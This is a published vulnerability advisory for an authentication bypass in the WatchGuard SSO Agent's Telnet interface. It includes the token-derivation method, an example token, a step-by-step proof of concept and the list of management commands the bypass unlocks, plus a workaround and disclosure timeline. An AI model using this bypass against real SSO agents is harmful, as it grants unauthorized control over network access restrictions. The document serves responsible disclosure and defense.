WatchGuard SSO Agent Telnet Authentication Bypass

The WatchGuard SSO Agent exposes a Telnet interface on TCP port 4114 which is vulnerable to an authentication bypass granting unauthenticated attackers access to management commands.

Details

• Product: WatchGuard Active Directory Single Sign-On (SSO)
• Affected Versions: Authentication Gateway <= 12.10.2
• Fixed Versions: None
• Vulnerability Type: Authentication Bypass
• Security Risk: high
• Vendor URL: https://www.watchguard.com/
• Vendor Status: notified
• Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-007
• Advisory Status: published
• CVE: CVE-2024-6593
• CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6593

Introduction

When users log on to the computers in your network, they must give a user name and password. If you use Active Directory authentication on your Firebox to restrict outgoing network traffic to specified users or groups, your users must also complete an additional step. They must manually log in again to authenticate to the Firebox and get access to network resources or the Internet. To simplify the log in process for your users, you can use the WatchGuard Single Sign-On (SSO) solution. With SSO, your users on local networks provide their user credentials one time (when they log on to their computers) and are automatically authenticated to your Firebox.

(from vendor’s homepage)

More Details

The WatchGuard SSO Agent exposes a Telnet interface on TCP port 4114. Without authentication, only the help message can be displayed:

$ telnet <host> 4114
Trying <host>...
Connected to <host>.
Escape character is '^]'.

EVENT 350 log info Connected to the WatchGuard Authentication Gateway SSO agent. Version 12.10.2.29857 Build 691995. Connected at:06/06/2024 11:16:44
 To log in to the SSO Agent, type your user credentials. Or, type "help" to see the list of available log in commands.
 After you log in, type "help" to see all of the commands available for the SSO Agent.

help
?                        Show help
help                     Show help
login <user> <password>  Log in user. Use quotes if there are spaces in the credentials.
quit                     Terminate the connection.

It was discovered, that the authentication can be bypassed by issuing a command followed by a Base64-encoded token, which can be calculated by XORing the timestamp from the initial message (in this case 06/06/2024 11:16:44) with the repeated byte 0x89. Generating this token was implemented in https://github.com/RedTeamPentesting/watchguard-sso-client:

$ ./wgclient.py authbypass 'EVENT 350 log info Connected to the WatchGuard Authentication Gateway SSO agent. Version 12.10.2.29857 Build 691995. Connected at:06/06/2024 11:16:44'
ub+mub+mu7m7vam4uLO4v7O9vQ==

The token can then be used to bypass authentication in the Telnet session:

async-test list UI ub+mub+mu7m7vam4uLO4v7O9vQ==
[...]
help

?                        Show help
help                     Show help
login <user> <password>  Log in user. Use quotes if there are spaces in the credentials.
logout                   Log out.
get user <ip>            Show all users logged in to <ip>.
                           Ex:get user 192.168.203.107
get timeout              Show the current timeout value.
get status               Show the status for connections.
get status detail        Show connected SSO clients, pending, and processing IP addresses.
get clear cache status   Show SSO Agent and ELM clear cache status.
get domain               Show the current domain filter.
get version <ip>         Show the SSO component name, version, and build information for the IP address.
get version all          Show the SSO component name, version, and build information for all the monitored IP addresses.
log off <ip>             Remove the IP session on FireBox and reset SSO Exchange Monitor Session Check Internal.
set domainfilter on      Enable domain filter.
set domainfilter off     Disable domain filter.
set user                 Set artificial user information (for debugging)
set debug on             Save debug messages to a file in the same location as the .exe.
set debug verbose        Enable additional log messages.
flush <ip>               Clear cache of <ip> address.
flush all                Clear the cache of all IP addresses.
list                     Return a list of all the IP addresses in the cache with expiration dates.
list config              Return a list of all the monitored domain configurations.
list user                Return a list of all registered users.
list eventlogmonitors    Return a list of all Event Log Monitors.
list exchangemonitors    Return a list of all Exchange Monitors.
quit                     Terminate the connection.

Attackers can then issue management commands. For example, it is likely possible to set artificial user information in order to apply or lift network restrictions for arbitrary hosts.

Proof of Concept

Connect to the Telnet interface of the WatchGuard SSO Agent:

$ telnet <host> 4114

Copy the initial message and use it to generate an authentication bypass token using https://github.com/RedTeamPentesting/watchguard-sso-client:

$ ./wgclient.py authbypass '<message>'

Issue the following command with the generated token in the telnet session to bypass authentication:

async-test list UI <token>

Workaround

As a workaround, network access to the Telnet interface port should be restricted to trusted hosts that actually require access to this specific interface.

Security Risk

Attackers can issue management commands via the Telnet interface of the WatchGuard SSO Agent without prior authentication. This level of access may be used to apply or lift network restrictions to arbitrary hosts. Therefore, this vulnerability poses a high risk.

Timeline

• 2024-06-05 Vulnerability identified
• 2024-06-10 Customer approved disclosure to vendor
• 2024-06-20 Vendor notified
• 2024-06-27 Vendor confirmed they received the reports
• 2024-07-04 Asked vendor to confirm the vulnerabilities and provide a timeline to resolve the issues
• 2024-07-09 Vendor confirmed vulnerabilities, said a timeline will be provided at a later date
• 2024-08-08 Asked for update regarding timeline, reminded vendor about 90-day responsible disclosure time frame
• 2024-09-03 Asked for update
• 2024-09-10 Asked for update again with hint to our planned release after 90 days
• 2024-09-13 Vendor provided update that a potential resolution was identified
• 2024-09-16 Vendor announced they will publish advisories on the following day, a fix is planned for end of October
• 2024-09-17 After customer conferred with WatchGuard, publication was deferred for one week in order to implement mitigations
• 2024-09-18 Confirmed new release date with WatchGuard
• 2024-09-25 Advisory published

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/